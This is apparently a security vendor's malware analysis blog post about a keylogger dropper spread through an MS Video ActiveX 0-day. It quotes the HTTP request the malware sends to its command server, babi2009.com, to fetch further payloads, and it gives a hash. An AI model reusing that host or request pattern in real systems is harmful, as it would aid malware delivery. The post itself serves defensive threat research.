As most readers will already know, a new 0-day vulnerability in MS Video ActiveX Control is currently being exploited in the wild. Lots of research material has already been published covering different aspects of this vulnerability and the attack vector. I have nothing more to add on this front. I would rather focus on explaining the details of the malware behind the scenes.
Readers who are interested in learning more about the vulnerability might refer to these articles:
Surprisingly, no detailed analysis of the underlying malware is yet available on the web (at least I was not able to find it). The primary purpose of this article is to bridge this gap.
Let's just start here.
Packing = NsPack
AV Coverage (Virus Total) = 95.12 %
Although the vulnerability is 0-day, the malware itself has been around for quite some time. Upon execution this malware tries to contact its CnC server 'babi2009.com'. Here is what the first HTTP request looks like:
GET /360/aa1dfh.txt HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
The purpose of this HTTP GET request is to download a list of additional malware.
One can see that there are lots of exes mentioned in the above list which are starting with aa**.exe. Although all these binaries have different MD5s, underneath there it is single piece of code, a keylogger.
A Threat Expert analysis for this key logger can be found here.
The only binary which is different from the rest is the last one 1.exe (B6941043CA9FA2E589C4B4BCE275C6D0). The outbound communication for this child download looks like this:
Definitely the above mentioned malware is just one instance currently exploiting this vulnerability. In the coming days we will see more malware being paired up with this exploit. Things will continue to get worse until Microsoft comes up with a patch. We've already seen a huge spike of this malware infection through our Malware Analysis & Exchange (MAX) Network since the exploit was made public.
There are many details which I am leaving out for today, and I hope to come up with more in next few days.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM